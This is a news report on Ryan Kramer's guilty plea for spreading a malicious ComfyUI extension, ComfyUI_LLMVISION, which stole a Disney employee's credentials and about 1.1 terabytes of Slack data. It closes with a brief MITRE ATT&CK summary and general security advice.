A California man, Ryan Mitchell Kramer, age 25, has pled guilty to hacking a Walt Disney Company employee by deceiving the individual into installing a malicious iteration of an open-source AI image generation tool. The US Attorney for the Central District of California announced that Kramer faced charges for unauthorized computer access and for making threats to damage a protected computer.
In his plea agreement, Kramer disclosed that he created an application hosted on GitHub designed to generate AI-based artwork, but it was embedded with code that covertly granted him access to the systems of users who installed it. Operating under the alias “NullBulge,” he aimed to exploit unsuspecting users.
Kramer utilized the program named ComfyUI_LLMVISION, which masqueraded as an extension for the legitimate ComfyUI image generator. However, this counterfeit version included functionalities engineered to extract sensitive information such as passwords and payment card details from compromised computers. The stolen data was relayed to a Discord server controlled by Kramer, and the malicious elements of the code were disguised within files named after reputable AI companies like OpenAI and Anthropic.
The Disney employee unknowingly downloaded ComfyUI_LLMVISION in April 2024. This action led to unauthorized access to the employee’s computer and online accounts, enabling Kramer to infiltrate private Slack channels utilized by Disney. By May, he had downloaded approximately 1.1 terabytes of sensitive data from these channels, exposing considerable confidential information.
In early July, Kramer reached out to the employee, falsely claiming to represent a hacktivist group. When there was no response from the employee, he proceeded to publicly release the stolen information later that month, which included not only private Disney data but also the employee’s banking, medical, and personal information.
During the plea proceedings, Kramer acknowledged that at least two other victims had also fallen prey to ComfyUI_LLMVISION, which facilitated unauthorized access to their systems. The FBI is actively investigating the matter, and Kramer is anticipated to appear in court in the coming weeks.
This incident reflects significant adversary tactics as outlined in the MITRE ATT&CK framework. Initial access was primarily achieved via social engineering, exploiting human trust to enable the installation of the malicious software. Techniques for persistence were likely embedded, as the malware maintained access to the compromised systems. The attack’s escalation to privilege abuse can be evidenced by Kramer’s access to private company channels, showcasing how attackers can leverage seemingly innocuous tools for extensive data exfiltration.
As businesses increasingly rely on advanced technologies, the potential for similar attacks emphasizes the necessity of safeguarding against social engineering and the deployment of malicious software. Stakeholders must remain vigilant and proactive in implementing robust cybersecurity measures to mitigate these risks.
